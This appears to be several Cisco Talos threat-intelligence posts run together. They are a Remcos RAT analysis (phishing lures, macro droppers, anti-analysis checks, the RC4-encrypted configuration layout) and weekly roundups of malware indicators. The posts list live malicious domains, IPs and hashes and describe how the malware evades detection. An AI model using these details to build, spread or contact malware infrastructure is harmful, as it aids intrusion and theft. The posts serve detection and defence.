• 049a1fd2db0b1c3d821df7ac882417c951a8a3be6531a05bc284b2373bcd0566
• 0672fe319c7296a01b04973c0455c4a07691a16a2c933f15c071bba72b155b0c
• 1e2c6e7c4a4986a3d9b30fb8aecb4cbacacc103251c9ba35e14905231f104dda
• 30cf07a5ec3d0300ba8e7ce94ebdcde0a3c3539aede029cb39a353e7e26fcc7b
• 425e43eafe61586cd6a4867031f40c390ed4958ca35c2a8d368fb61f479a596b
• 489bede16e3b6142ba3bd19e7a151ff68a19e6fcc7cdaff4013a9f0753e62bbb
• 49ba74297aa04e0a4167e9c93c4c42a2db7b8019d4cc2cef4e7cd1908d133d31
• 520e488e3f6cbebd0369e024a852cb340920806d40a03e7cc3dfeb7b1502ccce
• 58f94794c8deb918c75d14db29ec2858e7289a0dde7bc1adc8e2f889d50acddc
• 5a4984a7a98b0fc04b3540d637daa744d0b597174408ce72cb685bf0e2f47710
• 632a3d98fc2b2c1e2b7c733f0e1bc87b9c55b8dce9308f23a459d2d68cb26da2
• 65e7cea81c182922f11360de35f4102b81baaff17ab6fa98125e9397fb867817
• 6e693ce84c1d99035b703791b5bd8708a4ba6510f334907f82fe3d6e674e052d
• 71e3922788784923e9648eb00b51700ca16752fa0fb41a0e50e98bafd1611f09
• 73f2be7461e84cc88415bbe44340a09e02d6bd3dbc396c708b5282da3e589064
• 79653c2fffae7dac30fb798f011c7b96c348a9b1aad37f2a3ef54d29e03e33d0
• 804e649a4ec4c60b27ccf828188322b42552e416e84f810177f856c514ca6d60
• 8a82e6490ddd36681e95e2e1079229fe07831279c3c4ec96cb159fb176f276fe
• 8c6b650941754525d9d0bec9356940af5860fefcc335507a82742e91c1c182db
• 9b1131872b4d42f9a5540fdcfe06eaa6591ae216eca749f4a98e5fefdc9f5fd4
• 9b5e56c14b1b66d3da0f2535a83b3498c7fb2e41d44b68f3474eaf6921afbbb7
• 9f4b64e4d8ac9c139f226c7ee53f86ba7285aeaf83818c0c5408c4814a8daf77
• a42ce1c1929e461d7f695a3790d4021286f03ed8a011013282400c5368ca2965
• b1dc3244cf44aa70d30fa06f7367c90240638c0f0f98ac419dd603b101c10eac

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Dropper.Zbot-6646698-0

Indicators of Compromise

Registry Keys

• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
• <HKCU>\SOFTWARE\MICROSOFT\Exeboz
• <HKCU>\Software\Microsoft\Windows\Currentversion\Run

Mutexes

• Global\Instance0: ESENT Performance Data Schema Version 85
• Local\Identity CRL v1 File Access
• Local\MSIdent Logon
• Local\microsoft_thor_folder_notifyinfo_mutex
• Global\{2514E002-3297-704B-6F6E-B811A843C5E5}
• Global\{2514E002-3297-704B-7365-B811B448C5E5}
• Global\{2514E002-3297-704B-776C-B811B041C5E5}
• Global\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7

IP Addresses

• N/A

Domain Names

• blessedgroup[.]biz

Files and or directories created

• %LocalAppData%\Temp\ppcrlui_248_2
• %LocalAppData%\Temp\ppcrlui_248_2.ui
• %LocalAppData%\Temp\tmp5a3b8626.bat
• %LocalAppData%\Temp\tmpb0cd0744.bat
• %AppData%\Coviwys\mehotie.exe
• %AppData%\Uwgav\ymyrus.kuq

File Hashes

• 00987def616457475aac07bba673d78c8bef8f84a4062320afe37486353c5e5f
• 0165b6625c320d2af053f6ff1b529fc2579eaaec575b3868fb23a6c8ab8c8799
• 0295ba8a376efa16ea7183a23cc5cf652b2ea39ea8f89e0835d926d68a42f5cb
• 02a7a8e854a02aac1b6db03a4951587e1516838674e6259f595d9d7dabb9df51
• 02b3e32d1631794411c090d5acaf95a2d7aa7e9c6dd07c221894610ad24c6110
• 038004cf5ba6490879f516dcc3574d2e283bd617cfa78cbe71883c6015ff1e72
• 04a00b5e202eeddeaf642be882fb803044dbfc20c241d6bb5900164daa45377a
• 05956361e1a11da5ebb290f27e493959870d9b93cd58df1156f90d17e24f1b76
• 07230d5a078c77c5f722ca323d738b437d5b038aa966b4078c332228bc8d13eb
• 0a5dbd0ec79d4d713760e7108a856e4325c7046ad183ebcfab674b129b661378
• 0aad831be57fac0cc9a3d5ec8aec0cebac077b0ef8fa3120af392ddef1b659fc
• 0d4bef2706a84bf9f123b40e3f582fa6dcc52eecab81e9e5f4e646a5cfe844da
• 0d6be142355a17c5231f292278a0e68ab1dab8d150e697261b9f26938bc82f54
• 0fbe2e9f72532608295e24cdf23d7aad1b1112a566099099f4d5120bb8821637
• 14bbd281ac544bae80c3349167c29adfa821734d064532bdadc8146a5818ddc7
• 15a35d117cbdb6b02c152a0a40136846ae2e49d98aab039a53396054858b659b
• 16dbf776fa3fad4a630e5fed8c73819ba2a5316305463975c26f8cb06aace207
• 1725beb1344e48940ab5668e04cfa6e713acfe6384d11f4cc4539f2fd771019a
• 19190ecd3ec953b37bdce918ca4c82791f70bdb6f7be3d2aeaa4e3c134cdecf4
• 1adea3431604c725da1c887c0622c8d8f69fe5658682b2f002ac024d0d34e759
• 1b6e18cc6a94f26e3ad362a03f4fa61a6085c90b0a3945dc56115a7a45a65ca1
• 1d30657d8443af8f5a1d914d109b3d7ee5042d55df0e395b1418ea86647fc818
• 200fc49b5f8541fb16e82a4d5d53d14abd8612a8e5212dbdd06d509c9df3bef2
• 229776dbe35f9e7845d0ca164d0b3d54462d4cdd8e0fe365cb032ef7fe43cea5
• 248cedb88ee7bdd359f952b3dac1f93dab607a33b8b4d0dcb4c9e1c09e317e43

Coverage

Screenshots of Detection

AMP

ThreatGrid

This blog post was authored by Edmund Brumaghin and Holger Unterbrink with contributions fromEric Kuhla and Lilia Gonzalez Medina.

Overview

Cisco Talos has recently observed multiple campaigns using the Remcos remote access tool (RAT) that is offered for sale by a company called Breaking Security. While the company says it will only sell the software for legitimate uses as described in comments in response to the article here and will revoke the licenses for users not following their EULA, the sale of the RAT gives attackers everything they need to establish and run a potentially illegal botnet.

Remcos' prices per license range from €58 to €389. Breaking Security also offers customers the ability to pay for the RAT using a variety of digital currencies. This RAT can be used to fully control and monitor any Windows operating system, from Windows XP and all versions thereafter, including server editions.

In addition to Remcos, Breaking Security is also offering Octopus Protector, a cryptor designed to allow malicious software to bypass detection by anti-malware products by encrypting the software on the disk. A YouTube video available on the Breaking Security channel demonstrates the tool's ability to facilitate the bypass of several antivirus protections. Additional products offered by this company include a keylogger, which can be used to record and send the keystrokes made on an infected system, a mass mailer that can be used to send large volumes of spam emails, and a DynDNS service that can be leveraged for post-compromise command and control (C2) communications. These tools, when combined with Remcos provide all the tools and infrastructure needed to build and maintain a botnet.

Within Cisco's Advanced Malware Protection (AMP) telemetry, we have observed several instances of attempts to install this RAT on various endpoints. As described below, we have also seen multiple malware campaigns distributing Remcos, with many of these campaigns using different methods to avoid detection. To help people who became victims of a harmful use of Remcos, Talos is providing a  decoder script that can extract the C2 server addresses and other information from the Remcos binary. Please see the Technical Details section below for more information.

Technical Details

Remcos distribution in the wild

Talos has observed several malware campaigns attempting to spread Remcos to various victims. Since Remcos is advertised and sold on numerous hacking-related forums, we believe it is likely that multiple unrelated actors are leveraging this malware in their attacks using a variety of different methods to infect systems. Earlier this year, RiskIQ published a report regarding an attacker who was reportedly targeting defense contractors in Turkey. Since then, this threat actor has continued to operate and has been observed targeting specific types of organizations. Talos has confirmed that in addition to defense contractors, this attacker has also targeted other organizations such as:

• International news agencies;
• Diesel equipment manufacturers and service providers operating within the maritime and energy sector; and
• HVAC service providers operating within the energy sector.

In all of the observed campaigns, the attack begins with specially crafted spear phishing emails written in Turkish. The emails appear as if they were sent from a Turkish government agency and purport to be related to tax reporting for the victim's organization. Below is an example of one of these email messages:
The attacker put effort into making the emails look as if they were official communications from Gelir İdaresi Başkanlığı (GIB), the Turkish Revenue Administration, which operates under the Ministry of Finance and is responsible for handling taxation functions in Turkey. The attacker even went as far to include official GIB graphics and the text at the bottom which translates to:

"Thank you for your participation in the e-mail notification system of [the] Department of Revenue Administration's e-mail service. This message has been sent to you by GIB Mail Notification System. Please do not reply to this message."

As is common with many spear phishing campaigns, malicious Microsoft Office documents are attached to the emails. While the majority of these documents have been Excel spreadsheets, we have also observed the same attacker leveraging Word documents. In many cases, the contents of the document have been intentionally blurred as way to entice victims to enable macros and view the content. Below is an example of a Word document associated with one of these campaigns that have been made to look as if it is a tax bill:
Many of the Excel spreadsheets we analyzed were mostly blank, and only included the following image and warning prompting the victim to enable macros in Turkish:
We have also observed campaigns that appear to be targeting English-speaking victims. Below is an example of one of the malicious attachments that were made to appear as if it was an invoice on letterhead associated with Iberia, which is the flagship airline in Spain.
In addition to the Iberia-themed malicious documents, we uncovered multiple malicious documents that were created to appear as if they were invoices associated with AMC Aviation, a Polish charter airline. Talos has observed the following same itinerary decoy image used across both Excel and Word documents:
As described in the RiskIQ report, the macros in these files contain a small executable that is embedded into the document in the form of a series of arrays. When executed, the macros reconstruct the executable, save it to a specific location on the system and execute it. The file location specified changes across malicious documents, but includes directories commonly used by malware authors such as %APPDATA% and %TEMP%. The executable filename also changes across documents.

The extracted executable is simple and functions as the downloader for the Remcos malware. It is a very basic program and is used to retrieve Remcos from an attacker-controlled server and execute it, thus infecting the system. An example of this is below:
Remcos is a robust RAT that can be used to monitor keystrokes, take remote screen captures, manage files, execute commands on infected systems and more. In several cases, the distribution servers associated with these campaigns have been observed hosting several other malicious binaries in addition to Remcos.

Who is behind Remcos?

As previously mentioned, a company called Breaking Security has been offering Remcos and other questionable software for purchase on their website. There are no details about the company or the people behind it listed on its website. The website does, however, list a value-added tax (VAT) number (DE308884780) which shows the company is registered in Germany. Interestingly, you can look up the name and address of companies in almost any European Union (EU) country except Germany on this website. Germany does not share this information due to privacy concerns. Because Breaking Security was registered in Germany, we were unable to identify the name and address of the individual behind this company. Nevertheless, we were able to identify several artifacts that give us an idea as to who might be behind the company.

The Breaking Security domain is hosted behind Cloudflare currently, and Whois privacy protects the registrant information. Quite a bit of effort has been put into attempting to mask who is behind this company and the associated software. During our analysis, we were able to uncover several clues about the individual that we believe is behind this organization, either due to mistakes or very well organized false evidence on the internet.

The first thing we identified was the following email address and domain present in the Viotto Keylogger screenshot below:

    logs@viotto[.]it
    viotto-security[.]net
While the viotto-security[.]net domain server and registrant information is protected similar to what was seen with the breaking-security[.]net domain, the domain viotto[.]it listed in the "Sender's e-mail" text field is not. The Whois information associated with this domain can be seen in the screenshot below:
Normally Talos would obfuscate this data however since it is public in so many places we have elected not to. We also identified additional email, Jabber, and XMPP addresses that appear to be used by the author of Remcos by leveraging the data we collected from the website, as well as other sources:

    viotto@null[.]pm
    viotto24@hotmail[.]it
    viotto@xmpp[.]ru

In multiple cases, the domains investigated were leveraging the Cloudflare service. This often obscures the address of servers hosting domains, as the DNS configuration typically points the name resolution to Cloudflare IPs rather than the IP of the web servers themselves. One common mistake is that while the domain itself may be protected by Cloudflare, in many cases, a subdomain exists that does not point to Cloudflare servers, allowing the server IP address to be unmasked.

This was the case with the breaking-security[.]net domain. While Cloudflare shields the domain, their mail subdomains are not protected. The A record that was configured for the mail subdomains is as follows:

    mail[.]breaking-security[.]net. A 146.66.84[.]79
    webmail[.]breaking-security[.]net A 146.66.84[.]79

The IP address 146.66.84[.]79 is hosted at SiteGround Amsterdam. After various testing, we are confident that this is also the IP address where the main breaking-security[.]net website is hosted.

One of the other domains we identified as being associated with Remcos was viotto-security[.]net. This domain is currently configured to redirect traffic to the main breaking-security[.]net domain. However, this was not always the case. Searching for pages associated with this domain in the Wayback Machine, a website that allows users to view past versions of a web page, yields the following result in the form of a personal biography. There are multiple clear overlaps between the interests of this individual and the developer of the various tools the company sells:
We also identified several instances where Viotto was advertising, selling and supporting Remcos on various hacking forums, including HackForums since at least 2016, which makes their intentions questionable. Below is an example of one of these threads.
While the company states that they revoke user licenses if they were to use Remcos for illegal activity, as illustrated by the thread below the purported official reseller of Remcos doesn't seem to mind another user informing it that they are using the software to control 200 bots.
Viotto also appears to be active on other hacking forums, including OpenSC, where he is a moderator. Below is a thread where this user is advertising Remcos and Octopus Protector.

Remcos Technical Details:

As described in other blog posts, Remcos appears to be developed in C++.
As the release notes show, it is actively maintained. The authors release new versions on almost a monthly basis:

v2.0.5 – July 14, 2018
v2.0.4 – April 6, 2018
v2.0.3 – March 29, 2018
v2.0.1 – Feb. 10, 2018
v2.0.0 – Feb. 2, 2018
v1.9.9 – Dec. 17, 2017

Remcos has the functionalities that are typical of a RAT. It is capable of hiding in the system and using malware techniques that make it difficult for the typical user to detect the existence of Remcos.

Several routines are looking like they were just copied and (best case) slightly modified from publicly available sources. A good example is the anti-analysis section:
It is checking for an outdated artifact, the 'SbieDll.dll'. In our opinion, there are not many analysts using Sandboxie these days anymore. A closer look at the other functions is also showing a high code similarity to publicly available projects. Below you can see the Remcos VMware detection code:
The following is a code sample from aldeid.com:
The blog referenced above has already described several functions of Remcos features in detail. We would like to focus on Remcos' cryptographic implementation. It uses RC4 pretty much everywhere when there is a need to decode or encode any data. Examples are registry entries, C2 server network communication or file paths shown below:
The exepath registry data is base64-encoded, RC4-encrypted data. Decoded, it is the path of the executable:

C:\TEMP\1cc8f8b1487893b2b0ff118faa2333e1826ae1495b626e206ef108460d4f0fe7.exe

The RC4 implementation is the standard RC4 implementation that can be found in many code examples on the internet. They are first building the Key Scheduling Algorithms (KSA) S_array at 00402F01.
This can be converted into the typical RC4 pseudo code:

for i from 0 to 255
        S[i] := i
endfor
j := 0
for i from 0 to 255
        j := (j + S[i] + key[i mod keylength]) mod 256
        swap values of S[i] and S[j]
endfor

Which is followed by the RC4 Pseudo-random generation algorithm (PRGA) at 00402F5B.
Which looks in pseudo code like this:

i := 0
j := 0
while GeneratingOutput:
        i := (i + 1) mod 256
        j := (j + S[i]) mod 256
swap values of S[i] and S[j]
        K := S[(S[i] + S[j]) mod 256]
        output K
endwhile

As the screenshots above illustrate, Remcos is using RC4 to encrypt and decrypt its data, and it is using the PE resource section to store the initial encryption key in the 'SETTINGS' resource. This key can have a variable length — we have seen short keys from 40 bytes to keys with more than 250 bytes.
They are storing the data in the following format:

[Length of key]
[Encryption Key]
[Encrypted configuration data]

This encrypted configuration data section contains the command and control servers, RAT commands to execute and other data. Decoded, it looks like this:
The decoded data contains the C2 server, e.g. ejiroprecious[.]ddns[.]net, and the corresponding port number, followed by a password. This password is used to generate a separate S_array for the RC4 encrypted C2 communication. The picture shows the relevant part of the RC4 Key Scheduling Algorithms (KSA) from above.
Even if a stronger password is used than in the example above, using such a weak encryption algorithm means that everyone who gets his or her hands on the binary file can extract the password and decrypt the C2 traffic or inject their own commands into the C2 channel to control the RAT. The good news is that companies who became a victim of Remcos have a good chance to analyse the threat if they have stored the network traffic and the Remcos binary file.

To make the life of forensic investigators easier, we are providing a small decoder Python script that can decode the config data from the resource section:
As mentioned above, Remcos is using the same encryption routine for all kinds of other functions, too. For this reason, the decoder program also offers an option to hand over encrypted bytes manually. This can be used to decode, for example, the exepath registry key.

We have used this tool to extract all the IOCs below. It is tested with the latest 2.0.4 and 2.0.5 versions of Remcos, but likely also works with other versions.
The user can also copy bytes from a network sniffer to a binary file, and hand it over to decrypt the bytes from the C2 communication to see which commands the C2 server has sent to the victim. Keep in mind to use the extracted password, e.g. "pass."

Conclusion

While the organization that sells Remcos claims that the application is only for legal use, our research indicates it is still being used extensively by malicious attackers, as well. In some cases, attackers are strategically targeting victims to attempt to gain access to organizations that operate as part of the supply chain for various critical infrastructure sectors. Organizations should ensure that they are implementing security controls to combat Remcos, as well as other threats that are being used in the wild. Remcos is a robust tool that is being actively developed to include new functionality increasing what the attackers can gain access to. To combat this, organizations should continue to be aware of this threat, as well as others like this that may be circulated on the internet.

Coverage

 

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), andMeraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of Compromise (IOC)

The following IOCs are associated with various malware distribution campaigns that were observed during analysis of Remcos activity.

Malicious Office Documents:

0409e5a5a78bfe510576b516069d4119b45a717728edb1cd346f65cfb53b2de2
0ebfbcbf8c35ff8cbf36e38799b5129c7b70c6895d5f11d1ab562a511a2ec76e
18f461b274aa21fc27491173968ebe87517795f24732ce977ccea5f627b116f9
2f81f5483bbdd78d3f6c23ea164830ae263993f349842dd1d1e6e6d055822720
3772fcfbb09ec55b4e701a5e5b4c5c9182656949e6bd96bbd758947dfdfeba62
43282cb81e28bd2b7d4086f9ba4a3c538c3d875871bdcf881e58c6b0da017824
48dec6683bd806a79493c7d9fc3a1b720d24ad8c6db4141bbec77e2aebad1396
4938f6b52e34768e2834dfacbc6f1d577f7ab0136b01c6160dd120364a1f9e1a
4e0bcef2b9251e2aaecbf6501c8df706bf449b0e12434873833c6091deb94f0e
72578440a76e491e7f6c53e39b02bd041383ecf293c90538dda82e5d1417cad1
77cf87134a04f759be3543708f0664b80a05bb8315acb19d39aaa519d1da8e92
8abcb3084bb72c1cb49aebaf0a0c221a40538a062a1b8830c1b48d913211a403
94ff6d708820dda59738401ea10eb1b0d7d98d104a998ba6cee70e728eb5f29f
9cccdb290dbbedfe54beb36d6359e711aee1b20f6b2b1563b32fb459a92d4b95
aa7a3655dc5d9e0d69137cb8ba7cc18137eff290fde8c060ac678aa938f16ec7
ad78b68616b803243d56593e0fdd6adeb07bfc43d0715710a2c14417bba90033
bb3e5959a76a82db52840c4c03ae2d1e766b834553cfb53ff6123331f0be5d12
c5b9c3a3bbfa89c83e1fb3955492044fd8bf61f7061ce1a0722a393e974cec7c
d3612813abf81d0911d0d9147a5fe09629af515bdb361bd42bc5a79d845f928f
e302fb178314aa574b89da065204bc6007d16c29f1dfcddcb3b1c90026cdd130
e7c3c8195ff950b0d3f7e9c23c25bb757668b9c131b141528183541fc125d613
ef5e1af8b3e0f7f6658a513a6008cbfb83710f54d8327423db4bb65fa03d3813
f2c4e058a29c213c7283be382a2e0ad97d649d02275f3c53b67a99b262e48dd2

Stage 1 Executables:

07380d9df664ef6f998ff887129ad2ac7b11d0aba15f0d72b6e150a776c6a1ef
1e5d5226acaeac5cbcadba1faab4567b4e46b2e6724b61f8c705d99af80ca410
224009a766eef638333fa49bb85e2bb9f5428d2e61e83425204547440bb6f58d
27dd5a3466e4bade2238aa7f6d5cb7015110ceb10ba00c1769e4bc44fe80bcb8
502c4c424c8f435254953c1d32a1f7ae1e67fb88ebd7a31594afc7278dcafde3
5a9fa1448bc90a7d8f5e6ae49284cd99120c2cad714e47c65192d339dad2fc59
91032c5ddbb0447e1c772ccbe22c7966174ee014df8ada5f01085136426a0d20
9114a31330bb389fa242512ae4fd1ba0c9956f9bf9f33606d9d3561cc1b54722
9fe46627164c0858ab72a7553cba32d2240f323d54961f77b5f4f59fe18be8fa
c2307a9f18335967b3771028100021bbcf26cc66a0e47cd46b21aba4218b6f90
c51677bed0c3cfd27df7ee801da88241b659b2fa59e1c246be6db277ce8844d6
da352ba8731afee3fdbca199ce8c8916a31283c07b2f4ebaec504bda2966892b

PE32 Executables:

A text file containing a list of Remcos PE32 executable hashes can be found here.

IP Addresses:

109.232.227[.]138
54.36.251[.]117
86.127.159[.]17
195.154.242[.]51
51.15.229[.]127
212.47.250[.]222
191.101.22[.]136
185.209.20[.]221
92.38.86[.]175
139.60.162[.]153
192.0.2[.]2
185.209.85[.]185
82.221.105[.]125
185.125.205[.]74
77.48.28[.]223
79.172.242[.]28
79.172.242[.]28
192.185.119[.]103
181.52.113[.]172
213.152.161[.]165

Domains:

dboynyz[.]pdns[.]cz
streetz[.]club
mdformo[.]ddns[.]net
mdformo1[.]ddns[.]net
vitlop[.]ddns[.]net
ns1[.]madeinserverwick[.]club
uploadtops[.]is
prince[.]jumpingcrab[.]com
timmason2[.]com
lenovoscanner[.]duckdns[.]org
lenovoscannertwo[.]duckdns[.]org
lenovoscannerone[.]duckdns[.]org
google[.]airdns[.]org
civita2[.]no-ip[.]biz
www[.]pimmas[.]com[.]tr
www[.]mervinsaat[.]com.tr
samurmakina[.]com[.]tr
www[.]paulocamarao[.]com
midatacreditoexperian[.]com[.]co
www[.]lebontour[.]com
businesslisting[.]igg[.]biz
unifscon[.]com

Today, as we do every week, Talos is giving you a glimpse into the most prevalent threats we’ve observed this week — covering the dates between Aug. 17 and 24. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, we will summarize the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive, and current is as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this round up are:

• Win.Dropper.Delf-6652911-0
  Dropper
  This family is a generic malware that is generally the first step of a more deep infection. Once the payload is executed on the machine, it downloads and runs new binaries. The malware is interested in credentials and focuses its attention on well-known applications such as Outlook, Thunderbird and Firefox, among others.
   
• Win.Malware.Generic-6652641-0
  Malware
  These samples are generic trojans that establish persistence using the autorun key, contact a command and control (C2) server, and try to steal information from the infected host.
   
• Win.Dropper.Generickdz-6652226-0
  Dropper
  This family is a generic malware that is generally the first step of a deeper infection. Once the payload is executed on the machine, it downloads and runs new binaries, such as Gandcrab.
   
• Win.Dropper.Ponystealer-6652151-0
  Dropper
  This malware is a dropper for PonyStealer, a bot that attempts to steal passwords from web browsers, email clients, instant messaging applications, and other software.
   
• Win.Dropper.Zbot-6651705-0
  Dropper
  Zeus (aka Zbot) is a trojan horse malware package used to carry out many malicious tasks. It is often used to steal banking information by man-in-the-browser keystroke logging and form grabbing.
   
• PUA.Win.Adware.Ibryte-6651661-0
  Adware
  Ibryte appears to be a dropper for adware. It reaches out after installation to download adware and prompts to install them, including anti-virus programs and media players.
   
• Win.Dropper.Razy-6651608-0
  Dropper
  Razy is oftentimes a generic detection name for a Windows trojan. Although more recent cases have found it attributed to ransomware that uses the .razy file extension when writing encrypted files to disk, these samples are the former case. They collect sensitive information from the infected host, format and encrypt the data, and send it to a C2 server.
   
• Win.Dropper.Cloud-6651616-0
  Dropper
  The initial binary contains an AutoIt script. The script is obfuscated. It creates several in-memory DLL structures with AutoIt's DllStructCreate and DllStructSetData. The script then executes the shellcode injected into these DLL structures.
   
• PUA.Win.Adware.Dotdo-6651541-0
  Adware
  This adware that sets up a proxy to deliver advertisements to the machine's browser. In some variants, the adware also prevents security software from being downloaded to hinder removal of the adware.
   
• Win.Dropper.Fareit-6651429-0
  Dropper
  Fareit is malware designed to steal sensitive information, such as stored login information. You can read more about it on our blog.
   

---

Threats

Win.Dropper.Delf-6652911-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• 3749282D282E1E80C56CAE5A

IP Addresses

• 216[.]146[.]43[.]71
• 103[.]63[.]2[.]227

Domain Names

• checkip[.]dyndns[.]org
• ajmanz[.]gq

Files and or directories created

• %LocalAppData%\Temp\P8g.exe
• %LocalAppData%\Temp\-1260536341.bat

File Hashes

• 11392aee8e563b31a4dd14051611148e6ec0d03b2ebcceb37631f27e4bbfcd88
• 12baa8549b752fb6446d498a6d9e1f1ca1b5cbefc97ae9902010a79d15165c6e
• 23fd50159c2daee2a9495400a08c67e92378b287b6635e30efb18b4f16acbf74
• 2b5f4ab8058a74d55a02d8cc6a0a8367263a1068472a2ad63092c2f1a8c825a0
• 2f30c3be0665864ce736acfc093553cc5b0af50146688b0b783982a336ca95c0
• 306a4a7a9a936a2e7aea01f9ae79e595aef2080abcf350a3c7ece41811509e84
• 41192d3dd2635bcd40c92ff46913842b00ac28e5f3d743ea9c79328070ed52cb
• 44114d762126e81487716a964ca2fe0d0fd0e4dba3dea72d619b0f4b32a26ead
• 45c4d4333c17ad765dfa4094e7552e11434b09c4a4274431ceb04bdbb362eddc
• 55ce8c73a62ccee965d023e48243d1f982c77d9fa9c34fd17f2893dd873681b0
• 5f4db44965a523643ad99b7fa7d28221d124a2e2c8c4be8273208b5819db78a0
• 6209350a55e20a0e38a65c0075c66f5e650926f9cce4ee31edb4f69aadaf5f11
• 63b2702c9458be0c53ac24668116946a584b5a96fe9c3379d2477374dc2ae014
• 76180cb564deace04d7c027d17c3297221d72abdd59dec55025507d92458076b
• 8650fb73b188371b1ee7c009b03267c03c3870e673f10d273291ee670d006ccc
• 89dbccfdb0048341d5b3ddb2af5bd8af2fff80a50799545c043bfbeee0d2fef5
• 8f3aaf0ed0a63e6156ab338ebe95e607b779c4ef1d3f99b2a9bf4f1ac25cf857
• a3be5e9da533c35fd20bdbc1a8c4f6821c6117f63f29c6f844a4af93e2bb5a16
• a6d7fc06cbf14af546b91253b55951fea195716bd40196226510b4dfc4a3cf59
• ab740b4fa20b8d8c27dfba02e04d6b4f772cd3b44aa2f1d4d1e3f76ea4631f29
• c57e8eb0fa71df68e6f1f8b4274d1b87f33ad7fab2ea9c3c9b9cf1ef7b572dc6
• d6ec082e1da8b63e3384bce47f2b058af2acd88526964db194ce794bc5830298
• d99b29fdd8fc6cb24f408feeff49fdc50fdfe79aaad541947f291ce2505a16b8
• e59d68db3399185b85bff7a0538fbf6d52a81783f9cfcd48a851be7a5d00e374
• e91767a779860ae57b777a1e8b6c97022556c8b36c908bba99c5b68157abd46b

Coverage

Screenshots of Detection

AMP



ThreatGrid



Umbrella

Win.Malware.Generic-6652641-0

Indicators of Compromise

Registry Keys

• <HKCU>\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
• <HKCU>\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2
• <HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
• <HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\

Mutexes

• 91RB0O61SEBW01Fz
• O51OB0RQTC73272z

IP Addresses

• 255[.]255[.]255[.]255
• 209[.]15[.]20[.]214
• 217[.]70[.]184[.]50
• 75[.]130[.]124[.]158
• 205[.]178[.]189[.]131
• 183[.]90[.]245[.]33
• 52[.]204[.]47[.]183
• 91[.]195[.]240[.]82
• 195[.]201[.]179[.]80
• 67[.]228[.]43[.]214

Domain Names

• www[.]zexpar[.]com
• www[.]themonkeygrindervintage[.]com
• www[.]unsubchef[.]com
• www[.]xn--vhq6e39ls7w[.]net
• www[.]marryingmaldonado[.]com
• www[.]shiqiyingli[.]com
• www[.]mywdn[.]com
• www[.]win[.]link
• www[.]risu-nursery[.]com
• www[.]sicknessfitness[.]com
• www[.]saurabh[.]online
• www[.]1113sophie[.]info
• www[.]kacakbahisfirmasi[.]com
• www[.]cryptocoindigital[.]com
• www[.]41230319[.]net

Files and or directories created

• %AppData%\O51OB0RQ\O51log.ini
• %AppData%\O51OB0RQ\O51logim.jpeg
• %AppData%\O51OB0RQ\O51logrv.ini

File Hashes

• 01ff22b56231012c85e52d2b78024bd4b9c7bc33fc73bb3e2a83a5840911002f
• 04f33361dc741051ae4b67475d747d8e4b60e0add47e0a2a03137a5423edf511
• 09578c66fa6950eb62bd7d0890546a3640878a7347ebd986911dddd9f305b867
• 0a4b87f413a8c8812977a80601790ecfa4429a4dc844db644a6716dce37f3240
• 10909a5c51633fe85233e741ed870b43c01c497a16f28baec778586bd4a5e577
• 149ef4c77df95084d134c13fa6a09b7695926fadf685cf3c8bf02946618125c1
• 15de8d526570f470f010c7dd88d1863bef27f4c62fce08fcd82d1f6651577089
• 163eda0df0d03eb61e15bf9e36339bb0bc76e587bcdb0aa8d6c747d039e93e29
• 17bcfff4f3284163944c5a027a1fef4969d2f5f53dc7437bc3b4204c35de09ab
• 1b0b85e1822dbd3db1b7e3459a5e0b00c195cb08f37b0ad814cc1f63aacf7252
• 1e4f76adc700b02c55bd1c5a084356babb407f242dece68cf9ba5ebf61f1d508
• 1fc76f62000f876b6994859ae31112b789851ff02750f621159ed18c303eec3e
• 203e94abc7b9c527b65c2217c7e2105b429c8a3552e126d1eca91fff0e41ec8d
• 22f482a7cee3ae84ef6e261f3cce4693534a58fd73d846b26870bf933ee80232
• 2a49c01fdd02032dd24b7b1c1fcb9b3aa335d269e69fa8f2a4a4424b1f3079d0
• 30580ba2618aa386ec975baf0b749d342c4ead3be18dd3d42dfbf7aab7321d0c
• 306bea0dfa73d5f76beec04ae3ba1fe4457c343f758c181ca90f91344853560e
• 34f40b1487afaa02bb6e0bc9c2ac5ceb0842acd09a3143a368f3c1959d9667fe
• 38fecd8713e3914e745e751e9c6c5d62d8caef09c46ce4742f5583ce463b0d55
• 3f00f59978a2af3e8f8076c4d33a626f8c4d26ef6a4bc7ae1c72544755fa5dd8
• 407252416a323a0dc9435d8b418137c211892db049b6e1797e2f2f506f6d7145
• 426a170dea0f17f430ec265efadeafad52afcf0355ebc5696259d155a48aef40
• 4a29cce7f2f330b801afbd3f1490f786e0786dc651100eface068576e52bc948
• 4e5249655b852066bb5f6213b638574625a7b60b2c6dfac3bb2e80ec9f72bc2d
• 4f27d56cd4f2aad7b16d568a14fad510ba816319f14006b247b09ba2c6b5d881

Coverage

Screenshots of Detection

AMP



ThreatGrid



Umbrella

Win.Dropper.Generickdz-6652226-0

Indicators of Compromise

Registry Keys

